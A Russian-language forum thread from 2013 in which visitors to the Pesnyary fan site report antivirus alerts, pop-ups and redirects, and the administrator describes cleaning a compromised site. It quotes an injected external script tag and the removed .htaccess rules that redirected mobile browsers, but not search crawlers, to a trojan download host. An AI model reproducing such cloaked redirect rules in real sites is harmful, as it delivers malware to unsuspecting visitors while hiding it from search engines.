Здравствуйте!
Не увидел контактных данных администрации, поэтому пишу сюда. Антивирус Avast обнаружил вирус при переходе из поиска Google на страницу "Песняры: музыканты - Валерий Яшкин"
http://www.pesnyary.com/muzykant/Yashkin_Valery/ (http://www.pesnyary.com/muzykant/Yashkin_Valery/)
Вирус я не запомнил и повторить эксперимент не смогу, т.к. антивирус его заблокировал, но предполагаю, что это может быть код
<script src="http://www.woodworx.co.uk/js/j.js"></script>
в самом начала любой страницы (кроме форума), которого по этике HTML там быть на должно.
Спасибо за информацию! :friends:
Олег, почему-то не открывается раздел "Музыканты"... В смысле, не работают ссылки на музыкантов. В чем дело, не знаете?
Да там вообще все внутренние ссылки не работают. Спасибо, Ольга. Я сообщил Феде, сегодня, думаю, разберутся.
Недели две-три назад у меня тоже возникли проблемы. При попытке войти куда-либо на форуме браузеры переадресовывали меня на некий сайт, где периодически выскакивала надпись-призыв перевести деньги на мобильный номер. Подумав, что подцепил вирус, переустановил систему. Не помогло. Знакомый системщик покопался в скриптах и уверенно заявил: "Это не у тебя". После этого видел то же самое на нескольких других компьютерах, а сейчас всё нормализовалось.
Кому-то этот сайт покоя не даёт, всё его атакуют. Интересно, кто? :)
Спасибо, сегодня уже всё нормально открывается.
Какие-то девицы стали появляться вверху на картинке этого форума. Я конечно не против девиц, но может это тоже вирус(я имел ввиду компьютерный вирус...).
Цитата: Олег Верещагин от 18 апреля 2013, 21:50:43Кому-то этот сайт покоя не даёт, всё его атакуют. Интересно, кто? :)
Можно попробовать догадаться исходя из того, кого мы обсуждали! "Не мытьём, дак кАтаньем..."
Цитата: IGORЬ от 19 апреля 2013, 03:45:29
Какие-то девицы стали появляться вверху на картинке этого форума. Я конечно не против девиц, но может это тоже вирус(я имел ввиду компьютерный вирус...).
Я никаких девиц не вижу. Может, это Яндекс.Директ, который показывает рекламу каждому пользователю лично, в зависимости от его поисковых запросов в Яндексе? ;)
Олег, в твоем возрасте не видеть девиц - это опасно! Попробуй зайти с другого браузера.
Цитата: IGORЬ от 19 апреля 2013, 03:47:42
Можно попробовать догадаться исходя из того, кого мы обсуждали! "Не мытьём, дак кАтаньем..."
Терзали и меня подобные "смутные сомнения", т. к. некоторое время назад при входе на сайт, при переходе между темами, страницами бдительный "Каспер" выдавал мне предупреждение типа "данный объект содержит вредоносную ссылку". Однако после того, как "мимо проходил" и, судя по всему, не зря, добрый человек (спасибо ему и администрации сайта), проблемы с "горчичниками" исчезли.
Две недели назад мне тоже жаловались на безобразия на сайте и даже прислали скриншот. (см ниже)
У меня ничего подобного не было, но у меня Mac OS X и Safari, а не эта стрёмная Opera на писюке. :lol:
На РС в Эксплорере тоже ничего не было. Зато раритетный скриншот! :super:
Цитата: Boris Bernshteyn от 19 апреля 2013, 09:07:31Олег, в твоем возрасте не видеть девиц - это опасно! Попробуй зайти с другого браузера.
А может и хорошо, что я их ещё вижу...
У той, в красном купальнике, почему-то кнопка Play не работает. Администратор, в чем дело!? :mad:
Аркадий вот чего-чего, а такого добра в интернете навалом... если надо, быстро найдешь
Если не надо, то тоже найдёшь.
Сайт конкретно взломали. А всё, как выяснилось, из-за кривых рук разработчика, который оставил дыры в коде двух самых древних скриптов, которыми хакеры и воспользовались. Могу только сказать в своё оправдание, что тогда это были мои первые потуги в сайтописании, на других проектах, а так же в более позднем коде на этом, я уже таких ошибок не допускал. Допускал другие :)
В любом случае спасибо внимательным посетителям сайта, которые не проходят мимо, а сообщают о всяких неполадках.
Я думаю, что как МИНИМУМ пузырек надо поставить этому доброму человеку по имени "Мимо проходил"!!! :flowers: :friends:
мне, видимо, тоже надо было скриншот с девочками переслать по получении.. только кому? Феде? Олегу? С другой стороны, тот, кто мне его прислал, тоже мог послать администратору.
Я бы тоже хотел обратить ваше внимание вот на что: мой McAfee регулярно предлагает мне заблокировать сайт pesnyary.com Я не придавал этому особого значения и наотрез отказывался. Оказывается неспроста он это делает. Прислушивайтесь к защитным функциям своего компьютера.
Видимо надо предохраняться не только ..., но и ...
или...
Дня два было тихо, а теперь опять Касперский начал ругаться при заходе на сайт и в любой его раздел:
(https://pesnyary.com/forum/proxy.php?request=http%3A%2F%2Fs017.radikal.ru%2Fi425%2F1304%2Fe0%2Fbb18de9252b7.jpg&hash=b48576b2c319731b0e68a14593fd90df94900141)
У меня тоже какие-то девчонки вылазят, свидания! :confused:
Да, и у меня опять точно такая же картинка, как у Евгения (уж лучше бы девчонки, как у Игоря!).
Цитата: Фролыч от 21 апреля 2013, 08:45:48Да, и у меня опять точно такая же картинка, как у Евгения (уж лучше бы девчонки, как у Игоря!).
А то!!!
А мне, при попытке зайти на сайт, настоятельно рекомендовали установить новую версию Flow Plauer. Обратилась к программистам, установили Opera Mobile, теперь только через нее захожу.
Установил Ad Muncher и всё стало нормально.
Ребята, верите или не верите!Приехал в Е-бург в командировку и ... девушки исчезли!(только на PC естественно ).Может у них аура какая-то...А может "Солярис"...
У меня Касперский по-прежнему ругается. Гнилое место. :(
Может, у Вас в кэше что-то осталось? Я не вижу никаких изменений файлов после удаления всех вирусов. У меня DrWeb молчит, Гугл с Яндексом тоже молчат.
Не факт. А почему тогда 2 дня было спокойно?
Сейчас зашёл "непуганным" Интернет-эксплорером (надеюсь, у него свой кэш), так всё равно ругается.
Причём, ругня идёт на какие-то картинки (gif, ico).
А если андроидом заходить на сайт, то оно отсылает на страницу, оповещающую, что ваш брозер старый и дает ссылку на "новый" apk. Т.е. не ошибка это админовская, а именно диверсия.
А какие картинки? Можете привести имена файлов? Это на форуме или на сайте?
Цитата: Олег Верещагин от 24 апреля 2013, 09:02:21
А какие картинки? Можете привести имена файлов? Это на форуме или на сайте?
На сайте: Загрузка объекта, содержащего вредную ссылку: http://www.pesnyary.com/favicon/ico, (http://www.pesnyary.com/favicon/ico,)
на форуме - "море" вредных ссылок, в основном объекты типа gif (львиная доля), png и др. Например:
http://pesnyary.com/forum/Themes/default/images/bbc/bold/gif (http://pesnyary.com/forum/Themes/default/images/bbc/bold/gif) или http://pesnyary.com/forum/Smileys/classic/biggrin.gif. (http://pesnyary.com/forum/Smileys/classic/biggrin.gif.)
Обнаруживает это сервис Kaspersky Sekurity Network (КSN) проверкой по базе вредоносных сайтов .(IE)
Картинки такие:
(https://pesnyary.com/forum/proxy.php?request=http%3A%2F%2Fs018.radikal.ru%2Fi505%2F1304%2Fc0%2F87f75d565498t.jpg&hash=7611cafb582fa7a26b7e94f463e629329974a290) (http://radikal.ru/F/s018.radikal.ru/i505/1304/c0/87f75d565498.jpg.html)
Проверьте, пожалуйста, что-то изменилось?
Олег, нет, так же ругается.
Евгений, приведённая Вами картинка весьма странная. Вот, например, внизу написано: "Загрузка объекта, содержащего вредоносную ссылку" и путь "http://www.pesnyary.com/forum/images/bkgrnd_dots.gif". Но в папке forum вообще нет такой папки images. А файлы, указанные Фролычем - это простые картинки. Я могу их даже прицепить к этому сообщению (только что скачал по указанным путям).
Олег, при попытке открыть прикреплённые вами картинки в отдельной вкладке Касперский их не одобряет:
(https://pesnyary.com/forum/proxy.php?request=http%3A%2F%2Fs019.radikal.ru%2Fi616%2F1304%2F5c%2Ff37c38a09e85.jpg&hash=c23dcda844ddbdf29897eba88038d8b43eedeea0)
Специально сейчас проверил с помощью DrWeb каталог с этими файлами - всё чисто. Дата последнего изменения, к примеру, файла biggrin.gif - 25.06.2006г. Неужели вирус с 2006 года сидит в этом файле?
Я не знаю что Касперский на этот счёт думает, но только вот не нравится ему.
Цитата: Олег Верещагин от 24 апреля 2013, 20:01:17Специально сейчас проверил с помощью DrWeb каталог с этими файлами - всё чисто. Дата последнего изменения, к примеру, файла biggrin.gif - 25.06.2006г. Неужели вирус с 2006 года сидит в этом файле?
Олег, я говорил, что у меня на службе фирменный Касперский на прошлой неделе через раз дергался-блокировал, а сейчас притих, наверно привык или устал.
^ Так у меня и дома фирменный, только какой-то неустанный. :confused:
а пользователям андроида по прежнему предлагается скачать трояна. видимо сам скрипт подменен. пропал дом.
Да? Я же вчера убрал эту строчку из .htaccess. Там действительна была ссылка на трояна для мобильных устройств. Вот, что там было:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|
slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\
slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://flowinstall.com/s/11971 [L,R=302]
значит еще осталось. погрепьте на "apps-up2.ru". именно оттуда предлагается брать яд.
Это предлагается при заходе на любую страницу сайта или на какую-то конкретную?
Нашёл ещё одну "бяку" в папке форума. Не получшело?
Да!
Теперь, коль допустили вас в закрома, может и ограничение на размер RSS сообщений уберете?
А что за ограничения? Где это?
Admin -> News and Newsletters -> Settings -> Maximum post length
Поставьте на максимум. Или хотя бы тыщ 10
Хорошо.
Что-то все успокоились, а место по-прежнему гнилое.
Касперский, по выражению знакомой бабушки Анатолия Ивановича, из дрисён вылазит при открытии сайта.
При проверках Касперский не находит ни угроз, ни уязвимостей (или находит те , что ликвидируются обновлением программ), а вот при открытии сайта выдаёт как всегда: "Загрузка объекта, содержащего вредоносную ссылку". Как уже отмечалось, подавляющая доля объектов - gif, есть также ico, png, js... В общем, расстался я с Касперским, поставил COMODO. И тишина...
Не думаю, что расстаться с Касперским хорошее решение. Как бы в каком-то другом случае тишина не вышла боком.
Это же нонсенс, если все сайты как сайты, а песняровский - Kaspersky-incompatible.
Да, наверное, поторопился с расставанием. Ну да ладно, понаблюдаю пока.
Попробовал проверить сайт при помощи http://sitecheck.sucuri.net/scanner/. (http://sitecheck.sucuri.net/scanner/.) Получилось, что сайт - "blacklisted", и угрозы безопасности могут исходить от ссылки pesnyary.com/msgpage. А http://antivirus-alarm.ru/proverka/ (http://antivirus-alarm.ru/proverka/) подвергает сомнению ссылку www.liveinternet.ru (http://www.liveinternet.ru) (по версии гугла).
Фролыч, blacklisted даёт только McAffe, неизвестно почему. Может, устаревшие данные. По поводу liveinternet.ru - вообще смешно. Это же всего лишь счётчик.
Ну, посчитал нужным поделиться. Спасибо за разъяснение, Олег.
может ещё не все базы обновились?
может нужно куда-то написать для удаления?
AVG проверил РС - пишет "безопасно"
Никто сегодня не сталкивался с вирусной деятельностью на форуме? Мне ту сообщили утром, но не нашёл, а сейчас сам попался. Вроде почистил.
У меня утром Аваст вопил и брыкался. Но я сказал ему заткнуться)))
Касперский уже который месяц держит сайт в чёрных списках. Постоянно вижу такие картинки:
(https://pesnyary.com/forum/proxy.php?request=http%3A%2F%2Fi066.radikal.ru%2F1307%2Ffb%2Fe7d3099ddab9.jpg&hash=a6a231ef7b7069297388bc791f751f30a09f1ae1)
Вчера, пока писал на форуме в теме, вылезло ...цкое окошко с лозунгом"вы выиграли какую-то хрень!подтвердите свой моб№". Не закрывалось мучительно долго.
Опять вам рекламу в скрипты засадили. Пришлось из терминального окна хром убивать. Видно дырявая у вас модификация.
Диггер, Киже. Когда и во сколько это было? Я вчера убил вирусный скрипт в /forum/settings.php в районе 19 часов по Москве. После этого возникали проявления вируса?
Примерно тогда же когда написал. Часов в 11 вашего вечера. Неубиваемое окно про яндекс.
Блин, весь сайт перерыл вручную, проверил DrWeb link checker - ничего не находится.
Олег, это было позавчера между 20 и 21 по Москве.
У меня сегодня всё тихо. Вчера почти весь день было то самое "неубиваемое окно про Яндекс". Примерно после 20-00 заходил на сайт - уже не было.
Похоже, что гадость эта к вам попадает через яндексовый счетчик. Я вот у себя его зафильтровал. Если безобразия прекратятся, то точно он.
Мой McAfee постоянно указывает на pesnyary.com, как на опасный сайт (с точки зрения security).
Не, не счётчик. Всё, отловил. В конфигурационном файле было.
Цитата: Олег Верещагин от 09 июля 2013, 07:57:29В конфигурационном файле было
товарищи Конфигсис и Экзекбат? :D
Что же делать? Вирус по-прежнему есть. Касперский ругается и запрещает вход на каждую страницу. После того, как, несмотря на антивирус вхожу, касперский ловит штук пять вредоносных ссылок. Иногда находит и трояна, и тогда запрещает вход без возможности преодоления. Я предполагаю, что вирус прицеплен именно к картинкам, потому что фотографии никак не воспроизводятся. Если же их попытаться открыть в новом окне, то опять появляется запрещающее сообщение. Если преодолеть запрет, то тогда фотографию можно рассмотреть.
Ловит именно на сайте или только на форуме?
Не могли бы Вы зайти на сайт http://ensembles.ru (http://ensembles.ru) и посмотреть, будут ли там сообщения о вирусах? Физически это тот же сайт, что и pesnyary.com, и если есть вирус на одном, то должен быть и на другом.
Ловит на всём сайте тоже. Вот скриншот
(https://pesnyary.com/forum/proxy.php?request=http%3A%2F%2Fimg-fotki.yandex.ru%2Fget%2F5009%2F73674634.c%2F0_df8fe_b67609b6_L.jpg&hash=a54a8c0e2dd599d5a26efef3fac3e638bef6115f)
Касперский возмущается по поводу объектов с расширением .jpg, то есть, картинок. И картинки не отображает.
На [size=78%]http://ensembles.ru (http://ensembles.ru/)[/size] захожу спокойно, касперский молчит.
Скриншот не прицепился.
Ну вообще это странно. Сайт-то один физически. Не может быть такого, что по одному адресу вирус есть, а по другому - нет. Жду от Вас скриншота. Надо разобраться.